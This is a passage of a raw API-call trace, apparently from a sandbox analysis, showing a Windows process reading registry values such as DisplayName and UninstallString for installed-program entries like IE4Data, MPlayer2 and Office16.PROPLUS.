lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0146.720] RegQueryValueExW (in: hKey=0x238, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bd8 | out: hHeap=0x4780000) returned 1 [0146.720] RegQueryValueExW (in: hKey=0x238, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a70 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a860 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b60 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b10 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a48 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a890 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec10 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4768 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b30 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bf0 | out: hHeap=0x4780000) returned 1 [0146.720] RegOpenKeyExW (in: hKey=0x220, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x23c) returned 0x0 [0146.720] RegQueryValueExW (in: hKey=0x23c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.720] RegQueryValueExW (in: hKey=0x23c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a46f8 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0db8 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ea8 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e30 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e58 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e918 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e778 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a48 | out: hHeap=0x4780000) returned 1 [0146.721] RegQueryValueExW (in: hKey=0x23c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a7d0 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a20 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d40 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c28 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a800 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eb80 | out: hHeap=0x4780000) returned 1 [0146.721] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4ca8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b30 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bb0 | out: hHeap=0x4780000) returned 1 [0146.722] RegOpenKeyExW (in: hKey=0x220, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x240) returned 0x0 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e30 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a46c0 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b38 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.722] RegQueryValueExW (in: hKey=0x240, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a09f8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.722] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e768 | out: hHeap=0x4780000) returned 1 [0146.723] RegQueryValueExW (in: hKey=0x240, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.723] RegQueryValueExW (in: hKey=0x240, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a980 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ea8 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a7d0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b10 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ed0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ebc8 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4dc0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c10 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bf0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.723] RegOpenKeyExW (in: hKey=0x220, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x244) returned 0x0 [0146.723] RegQueryValueExW (in: hKey=0x244, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c28 | out: hHeap=0x4780000) returned 1 [0146.723] RegQueryValueExW (in: hKey=0x244, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4810 | out: hHeap=0x4780000) returned 1 [0146.723] RegQueryValueExW (in: hKey=0x244, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.723] RegQueryValueExW (in: hKey=0x244, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b10 | out: hHeap=0x4780000) returned 1 [0146.724] RegQueryValueExW (in: hKey=0x244, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ea8 | out: hHeap=0x4780000) returned 1 [0146.724] RegQueryValueExW (in: hKey=0x244, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e30 | out: hHeap=0x4780000) returned 1 [0146.724] RegQueryValueExW (in: hKey=0x244, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8d8 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e768 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e798 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.724] RegQueryValueExW (in: hKey=0x244, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e80 | out: hHeap=0x4780000) returned 1 [0146.724] RegQueryValueExW (in: hKey=0x244, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e80 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a980 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c90 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bb0 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e58 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c00 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a9e0 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec10 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4d18 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b70 | out: hHeap=0x4780000) returned 1 [0146.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798cd0 | out: hHeap=0x4780000) returned 1 [0146.724] RegOpenKeyExW (in: hKey=0x220, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x248) returned 0x0 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x248, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x19, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegOpenKeyExW (in: hKey=0x220, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x24c) returned 0x0 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x19, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x19, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.725] RegQueryValueExW (in: hKey=0x24c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x24c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x24c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x13, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.726] RegOpenKeyExW (in: hKey=0x220, lpSubKey="Office16.PROPLUS", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x250) returned 0x0 [0146.726] RegQueryValueExW (in: hKey=0x250, 